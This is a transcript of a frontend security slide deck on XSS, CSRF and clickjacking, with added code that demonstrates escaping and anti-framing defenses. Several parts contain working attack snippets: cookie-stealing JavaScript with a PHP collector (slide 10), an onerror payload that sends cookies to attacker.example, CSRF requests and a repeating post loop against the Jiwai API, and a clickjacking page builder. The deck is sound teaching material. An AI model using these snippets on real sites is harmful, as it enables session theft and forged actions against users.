F2e security

Published in: Technology, Design
Transcript

  • 5. Cross-site scripting (XSS)
  • 6. XSS
  • 7. Cookie; DOM; …
  • 8. Yupoo XSS
  • 9. alert
  • 10. Cookie theft: the JavaScript injected into the vulnerable page, and the attacker's PHP collector it reports to.
    JavaScript (runs in the victim's browser):
      // Load a 1-pixel "image" whose URL carries the victim's cookies to the attacker.
      var img = new Image();
      img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

    PHP (attacker's server):
      <?php
      // Append each stolen cookie string to a timestamped file.
      if (isset($_GET['var'])) {
          file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
      }
  • 12. Defense: filter input, escape output; Cookie; noscript?
  • 14. References:
    http://en.wikipedia.org/wiki/Cross-site_scripting
    http://www.gracecode.com/archives/2517
    http://www.gracecode.com/archives/2491
    http://ha.ckers.org/xss.html
    http://www.xssed.com/
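Slide 12's "filter input, escape output" applied to the Yupoo-style stored XSS, as an added example that is not from the slides. The helper names (escapeHtml, renderCommentVulnerable, renderCommentSafe, safeUrl, containsHandler), the host names and the sample payload are constructed here; the payload mirrors the cookie-theft image of slide 10. Note that escaping is context dependent: the same text escaper does nothing for an href, so URLs get their own check.

```javascript
// Added example (not the presentation's code): output escaping for the
// HTML text/attribute context, plus a URL-context check, demonstrated against
// a constructed payload in the style of slide 10.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML text and for values placed inside quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable rendering: user-controlled text goes straight into the markup.
function renderCommentVulnerable(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened rendering: the same template with the untrusted value escaped.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// URL context: escaping does not stop href="javascript:...", so only http(s)
// URLs are allowed through; everything else is replaced by a harmless "#".
// The base origin is a placeholder.
function safeUrl(url, base = 'https://app.example/') {
  try {
    const u = new URL(url, base);
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : '#';
  } catch {
    return '#';
  }
}

// Constructed payload (attacker.example is a placeholder): an <img> whose
// error handler ships document.cookie to a collector, as on slide 10.
const PAYLOAD =
  '<img src=x onerror="(new Image).src=' +
  "'http://attacker.example/get_cookie.php?var='+encodeURI(document.cookie)\">";

// Crude check for the demo: is there still an <img ... onerror= tag in the output?
function containsHandler(html) {
  return /<img[^>]*onerror=/i.test(html);
}

console.log(renderCommentVulnerable(PAYLOAD)); // handler survives, browser runs it
console.log(renderCommentSafe(PAYLOAD));       // rendered as literal text
console.log(safeUrl('javascript:alert(document.cookie)')); // "#"
```

escapeHtml only protects the text and quoted-attribute contexts; an unquoted attribute, a script block or a CSS value each need their own encoder, which is why "escape output" has to be done by the template layer per context rather than once on input.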
  • 15. CSRF (Cross-Site Request Forgery)
  • 16. <img src="http://.../del.php?id=64" />
  • 17. A cross-site POST, submitted from the attacker's page with the victim's cookies attached:
      <form action="http://jiwai.de/wo/status/update" method="post">
        <textarea name="jw_status"></textarea>
        <input type="submit" />
      </form>
  • 19. Worm-style CSRF against the Jiwai status API: once the script runs in a victim's browser it posts a message every second, with a timestamp to defeat caching.
      setInterval(function () {
          var img = new Image();
          var message = ''; // the message text on the slide did not survive extraction
          var api = 'http://jiwai.de/wo/status/update';
          img.src = api + '?jw_status=' + message + '&t=' + (+new Date());
      }, 1000);
  • 21. Defense: GET vs. POST, Cookie; Referer check; Token
  • 22. _tb_token_; Referer
  • 23. References:
    http://en.wikipedia.org/wiki/Cross-site_request_forgery
    http://www.cgisecurity.com/csrf-faq.html
    http://www.80sec.com/csrf-securit.html
    http://www.playhack.net/view.php?id=31
  • 24. Twitter Clickjacking
  • 25. 1. iframe Twitter (opacity 0)
        2. “ ”
        3. Twitter
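The slide-25 pattern in code, as an added example that is not from the presentation: the attacker's page frames the target invisibly on top of a decoy button, so the visible click lands on the framed page. It is paired with the two defenses: the anti-framing response headers, and the legacy frame-busting script written against a window-like object so it can be exercised outside a browser. Names (buildClickjackPage, antiFramingHeaders, isFramed, bustFrame) and the host names are constructed.

```javascript
// Added example (not the presentation's code): a clickjacking page builder
// and the two defenses against it.

// Attacker side: the target iframe is invisible (opacity 0) but stacked above
// the decoy, so whoever presses the decoy actually clicks inside the frame.
function buildClickjackPage(targetUrl, decoyLabel) {
  return [
    '<style>',
    '  #decoy  { position:absolute; top:100px; left:100px; z-index:1; }',
    '  #target { position:absolute; top:0; left:0; width:800px; height:600px;',
    '            opacity:0; z-index:2; }',
    '</style>',
    `<button id="decoy">${decoyLabel}</button>`,
    `<iframe id="target" src="${targetUrl}"></iframe>`,
  ].join('\n');
}

// Defense 1 (the one that holds): tell the browser the page may never be framed.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Defense 2 (legacy): frame busting. In a page this is
//   if (top !== self) top.location = self.location;
// It can be neutralised, e.g. by a sandboxed iframe that lacks
// allow-top-navigation, which is why the headers above are the real control.
function isFramed(win) {
  return win.top !== win.self;
}

function bustFrame(win) {
  if (!isFramed(win)) return false;
  win.top.location = win.self.location; // navigate the outer window to ourselves
  return true;
}

// Constructed window-like objects standing in for the real browser objects.
const targetWindow = { location: 'https://target.example/home' };
const attackerWindow = { location: 'https://attacker.example/dont-click' };
const framed = { self: targetWindow, top: attackerWindow };

console.log(buildClickjackPage(targetWindow.location, "Don't click"));
console.log(antiFramingHeaders());
console.log('busted:', bustFrame(framed), '->', attackerWindow.location);
```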
  • 27. CSRF
  • 28. Cookie Session
  • 29. “JS …”
  • 30. Q&A
  • 31. alert(/tHx/).replace(/.+/, eval);